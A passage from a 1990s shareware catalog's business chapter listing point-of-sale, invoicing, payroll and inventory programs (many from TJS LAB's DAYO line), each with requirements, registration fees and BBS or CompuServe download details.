Point-of-sale systems + + Product: ANNUITY ACE + Savings: deferred, immediate, split annuities. See full + description on page 331. + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 252. + + Product: DAYO LITTLE POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.62+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOPS.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPS.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A modified version of DAYO POS create to reduce memory + requirement. Useful on LANs and/or networks where memory is + usually at a premium. + + Chapter 7, "Business" 260 + + + + Product: DAYO ORDER ENTRY + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOZE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOZE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales orders based on the DAYO Inventory, Customer, and + other DAYO databases. Orders can be printed on a standard + printer or a Hewlett Packard(tm) Laserjet compatible printer. + The order can be printed on a pre-printed form, on the Laser + printer in a special laser format, or as a standard/default + form. + + + Product: DAYO POS (POINT OF SALE) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOPE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any size business. It + is the DAYO module that permits you to invoice out your + products while keeping an accurate record of all your 'sales'. + Features include: multiuser (ie: Novell), registers, quote + interface, templates, back orders, cash drawers, packing/ + shipping lists, labels, sales graphs, special pricing, tax + + Chapter 7, "Business" 261 + + + + codes, terms codes, credit limits, passwords, MRP interface, + multiple prices, and many reports. + + + Product: DAYO PRICE BOOK + DAYO special pricing, price books & lists. See full + description on page 309. + + Product: DAYO QUOTES + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOQE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOQE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Creates sales order quotes based on the DAYO Inventory, + Customer, and other DAYO databases. Quotes can be printed on a + standard printer or a Hewlett Packard Laserjet compatible + printer. The quote can be printed on a pre-printed form, on the + laser printer in a special laser format, or as a standard/ + default form. Totally integrated with the DAYO POS and/or + billing & invoicing modules. Templates (kits or bundles), are + supported. + + + Product: DAYO RENTAL POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 262 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOPR.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOPR.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A billing and invoicing application for any business that rents + items, equipment, or services, ie: videos, tapes, furniture, + tools, appliances, etc. Requires the regular DAYO POS module + for its reports and configuration settings. It is by default a + multiuser system, allowing almost unlimited numbers of users to + have the ability to simultaneously invoice using this one + program on a PC based LAN/network. + + + Product: DAYO SIMPLE POS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. Dayo pos. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOP1.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOP1.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + A a modified version of DAYO POS that was created to exclude + the option of selecting a customer. This program is used on + cash accounts only. Useful in grocery store type environments + (where no customer name is required). + + + Product: PCINV + Invoice writing. See full description on page 258. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 305. + + Chapter 7, "Business" 263 + + + + 7.1.3 Billing/invoice systems + + Product: DAYO BACK ORDERS (BO) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOOE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOOE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + The maintenance module for the processing of all your + customers/sales backorders. Working with DAYO POS, it + determines and manages the filling (allocation) of your + customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + + Product: DAYO BILLING & INVOICING + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBI.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOBI.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Permits you to invoice your products while keeping an accurate + record of all your 'sales'. Features include: Multiuser (ie: + Novell), registers, quote interface, templates, back orders, + cash drawers, packing/shipping lists, labels, sales graphs, + + Chapter 7, "Business" 264 + + + + special pricing, tax codes, terms codes, credit limits, + passwords, MRP interface, multiple prices, and many reports. + Very similar to DAYO POS, and uses the same manual. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Manage schedules; create quotes & price books. See full + description on page 289. + + Product: Financial Freedom Billing Mgr. + Author: M & R Technologies, Inc., 407-951-2268 + Version: 2.3 (12-15-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + discounts on other products. + Look for: FFBMGR.ZIP on BBSs; FFBMGR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11. + Download size: 619k (about 46 minutes with a 2400 baud modem) + Description: + Features include unlimited customers, three invoice printing + formats, user-selectable report sorting and sub-total options, + creates and prints mailing lists. Maintains purchase + histories, monthly and yearly summaries and many more reporting + options. Designed for any type of business activity. Will + streamline your billing and collection activities! + + + Product: Flexitime/Time Logging + Integrated time logging, recording, billing. See full + description on page 282. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 296. + + Chapter 7, "Business" 265 + + + + Product: PC-AR + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 4.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts receivable and sales summary program to + get the bills out. Contains many powerful features such as + auto billing, late charges, aging and alpha account numbers. + Reports include plain paper or pre printed statements, accounts + receivable ledger, charges and payments listing, sales summary + (with or without detail), customer activity report, mailing + labels and aging report. Inactive customers may be omitted + from most reports. Up to 8000 customers and invoices per + month. + + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 375. + + Product: Sales & Samples + Order & invoicing for home cosmetics sales. See full + description on page 305. + + Product: Time is Money + Author: Custom Data Solutions (Martin Schiff), 407-767-9278 + Version: 2.3 (12-07-94) + Needs: IBM PC, DOS 2.0 or better. 450k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $95.00 + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; source + code; all ASP-wide offers (see page 6). + Look for: TIM23.ZIP on BBSs; TIM23.ZIP on CompuServe in + CIS:CONSULT forum LIBrary 8 (or contact userID 76702,1355 for + assistance). + Download size: 195k (about 15 minutes with a 2400 baud modem) + Description: + A time and fixed price billing system that completely automates + your billing and receivables. It supports time billing in any + increment, and also the sale of equipment or fixed price + contracts. Facilitates the time recording and billing process + for anyone that bills by time and project. Maintains records, + + Chapter 7, "Business" 266 + + + + automatically generates invoices, and keeps a history of the + payment of those invoices. Simple to operate, yet versatile. + + + Product: Tolman Dental Program + Dental office managment program. See full description on + page 298. + + Product: WInvoices + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 1.0d (05-31-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Epson printer. + Registration fee: $29.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe, mail support; + all ASP-wide offers (see page 6). Lifetime free upgrading + allowed. + Look for: WINV10D.ZIP on BBSs; WINV.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 5888 + PsL#: 14036 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + An invoicing program which also keeps track of parts, + customers, work orders, and personnel. Comes in two versions; + Standard Edition allows you to create work orders and Invoices, + as well as to choose from several pre-defined reports. Deluxe + Edition includes all of the features of the Standard Edition, + plus it gives you the ability to define your own reports, + enabling you to view your data based on any criteria you care + to enter. + + + 7.1.4 Purchase order systems + + Product: DAYO INVENTORY + Inventory control and purchase orders. See full description on + page 270. + + Chapter 7, "Business" 267 + + + + Product: Office Supplies Tracker + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 1.42 (03-18-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $39.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: OST142.ZIP on BBSs (call 317-784-2147 to download it at + no charge); OST.ZIP on CompuServe in CIS:PCAPP forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 2445 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Complete office supplies tracking system. Maintain inventory + listings and quantities, stock locations, generate purchase + orders and purchase requisitions, and maintain vendor listings. + Automatically adjusts in-stock levels when orders are recieved + and posted. Automatic notification when in-stock levels drop + below specified quantities. Includes pop-up calculator and + appointment calendar. Context-sensitive online help. + + + 7.1.5 Payroll systems + + Product: Bottom Line Accounting + Small business accounting software. See full description on + page 252. + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 280. + + Product: DAYO PAYROLL + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 268 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOYE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOYE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provides a system for the computation of payroll for businesses + of any size. Features include: Multiuser, unlimited employees, + Weekly, BiWeekly, and/or Monthly payrolls, quarterly, year to + date (YTD), and current summary databases, Automatic payroll + posting & computation, vacation, sick pay/days, check printing, + multiple states, SDI tax, overtime & premium hourly wages, up + to 8 deductions, view reports on screen, medicare and many + reports. + + + Product: PC-PR + Author: Medlin Accounting Shareware, 707-255-4475 + Version: 2.4 (02-01-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Printer with a + condensed-mode font. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; bonus + data; discounts on other products. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A fast, simple payroll writing program. 1994 federal tax + tables and most state tax tables are included. Employees are + automatically sorted in alphabetical order. Allows up to five + deductions per check for 1200 employees. Reports include + employee listing (can be used as payroll input sheet), federal + liability by paydate, quarterly payroll listing, payroll + ledger, payroll check listing, employee history report and + annual W-2's. Supports tips, cafeteria plans and 401K plans. + + + Product: Time Keeper + D.base to record and report empl. attendance. See full + description on page 283. + + + 7.2 Inventory systems + + Product: Around The House + Complete personal/home information manager. See full + description on page 133. + + Chapter 7, "Business" 269 + + + + Product: Book Librarian + Book cataloging program. See full description on page 444. + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 220. + + Product: DAYO BAR CODE 3 OF 9 + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.55+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM. DAYO Inventory. + Strongly recommended: CGA monitor; Hard disk; HP LaserJet + printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; disks + of other shareware; discounts on other products; discounts on + upgrades. 1-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: DAYO39.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYO39.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Prints 3 of 9 bar codes with an Epson (tm) or IBM (tm) + compatible dot matrix printer. It is integrated with the DAYO + Inventory and the DAYO Customer databases. Labels are printed + onto standard labels (3.5 by 15/16 inches at 6 lines per inch). + The inventory bar code label consists of an item number, its + bar code, vendor item number, description, unit of issue, + weight, and bin/location. The customer bar code label consists + of a customer number, its bar code, customer's name and + telephone. + + + Product: DAYO END OF PERIOD + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. DAYO Inventory. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 270 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOEE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOEE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains routines that are normally run at the end of a + reporting period (ie: month). Permits you to permanently remove + deleted records from the accounts receivable (AR) and accounts + payable (AP) databases, and to erase old report text files. + There is also a routine for performing a physical inventory. + Many reports are included (ie: AR ageing, AP summary, inventory + movement). + + + Product: DAYO INVENTORY + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.56+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOIE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOIE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A multiuser inventory control, purchasing, and vendor + maintenance application. Use it to create and maintain an + inventory of any product. Features include multiuser (ie: + Novell, LANtastic), reports, labels, lists, and a graph. The + ability to upgrade and expand your system is available with the + addition of supporting DAYO products (ie: DAYO POS, DAYO AR, + DAYO AP, etc.). + + Chapter 7, "Business" 271 + + + + Product: DAYO MRP + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-15-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOWE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOWE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + A routine designed for manufacturers. Builds items (end items) + from item (components) in the inventory database. End items can + later be placed into inventory for later sales. Supports multi- + level bill of materials. Features include automatic inventory + posting and creation of inventory adjustment records, databases + are dBASE(tm) compatible, multiuser, and many reports. + + + Product: DAYO RETURN MANAGEMENT SYSTEM + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.00+ (12-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOFE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOFE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76711,1173 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Provide the means to record and track returns of your product. + Integrates to DAYO Inventory and its multiple warehouses to + allow tracking of items being returned (ie: breakages, + warranties, return to vendors). Creates RMA numbers. + + Chapter 7, "Business" 272 + + + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 311. + + Product: Household Register + Home/office inventory program. See full description on + page 519. + + Product: ICP + Author: Spirit7 Software, Ltd. (Scott Bigler), 703-943-4635 + Version: 11 (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; + Hercules monitor; Hard disk. + Registration fee: $65.00 (add $8.00 for shipping to Canadian + addresses) (add $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, newsletter, mail support; bonus + utilities; all ASP-wide offers (see page 6). + Look for: ICP11.ZIP on BBSs (call 703-949-4464 to download it at + no charge); ICP11.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 73530,3236 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Description: + A full-featured, general purpose inventory control system with + modules to sell, order, and receive inventory. Features complex + filtering (segmenting) of the data base by using the "and/or" + logical operators. Supports LIFO, FIFO, and weighted average + costing. Supports composite inventory (inventory items + consisting of other inventory items) and serialized inventory. + Can be upgraded to complete point-of-sale system (PICS) at any + time with no loss of data. Optional bar code module. + + + Product: Intelliship + UPS shipping manifest system. See full description on + page 319. + + Product: Inventory Interface + Author: Data Interface, 313-981-3615 + Version: 7.25 (04-01-95) + Needs: IBM AT (80286), DOS 3.3 or better. 500k RAM; Hard disk. + Strongly recommended: XMS memory. + Registration fee: $165.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + + Chapter 7, "Business" 273 + + + + 12-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: II7*.ZIP on BBSs; II7*.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 0 (or contact userID 71344,2354 for assistance). + SWREG#: 3133 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + An extensive Inventory, POS, and MRP package. Completely + integrated within the package are modules for inventory, bill + of materials, work orders, sales / order processing, AR, AP, + purchase orders, quotes, and request for quotes. Easy to use + table interface includes pick list for key values with online + help. Supports FIFO or LIFO inventory usage. All forms and + reports can be customized by the user. No preprinted forms are + necessary, but are supported. + + + Product: JRE Home Inventory + Log household items for insurance purposes. See full + description on page 543. + + Product: Layout + Author: Software Co-op, 317-856-6052 + Version: 3.1 (03-25-92) + Needs: IBM PC, DOS 2.0 or better. CGA monitor, IBM/Epson FX or + HP LaserJet printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: LAYOUT.ZIP on BBSs (call 715-652-2758 to download it at + no charge); LAYOUT.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 76635,1670 for assistance). + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + Keeps graphics layout of office furniture and equipment by room + and a database objects, each with 6 free-form fields. Multiple + rooms can be grouped together to form units such as + departmental charge areas. Inventory reports and export of data + to comma-delimited files for transfer to database programs or + spreadsheets. Data entry is via a mini-CAD system. Makes nice + printed room layouts. Solid system without a lot of frills. + Appeals to the office manager with rolled up sleeves. + + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 266. + + Product: RESTAURANT COST CONTROL + Inventory, purchases & accounts payable. See full description + on page 296. + + Chapter 7, "Business" 274 + + + + Product: SmartTracker Inventory + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.5 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6). + Look for: TKH250.ZIP on BBSs; TKHOME.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Track, organize and catalog your personal possessions. Select + category or room. Enter item, brand, model, serial #, cost, + quantity, date purchased, where purchased, id marks and + comments/description. Modify the categories and rooms to your + personal liking. Advanced search facility. Create 1-line, + 2-line or multi-line reports sorted by item, room or category. + Narrow reports down to one room or category. View or print. + + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 103. + + + 7.3 Decision analysis tools + + Product: Bubble Chart + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; BUBBLE.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 5 (or contact userID 76534,1166 + for assistance). + SWREG#: 6324 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Animated chart that dramatizes the changes of a company's + competitive market position versus its competitors. Companies + are represented by colored sphere that move to reflect the + + Chapter 7, "Business" 275 + + + + developing growth rate and market share over a period of time. + Companies that move towards the upper right corner are winners; + companies left in the lower left corner are losers. Import from + spread sheets. Save and print functions. Spot important shifts + in market positions at a glance! + + + Product: LAPC - Loan Advisor for the PC + Calculate & compare loan values and payments. See full + description on page 329. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 285. + + Product: 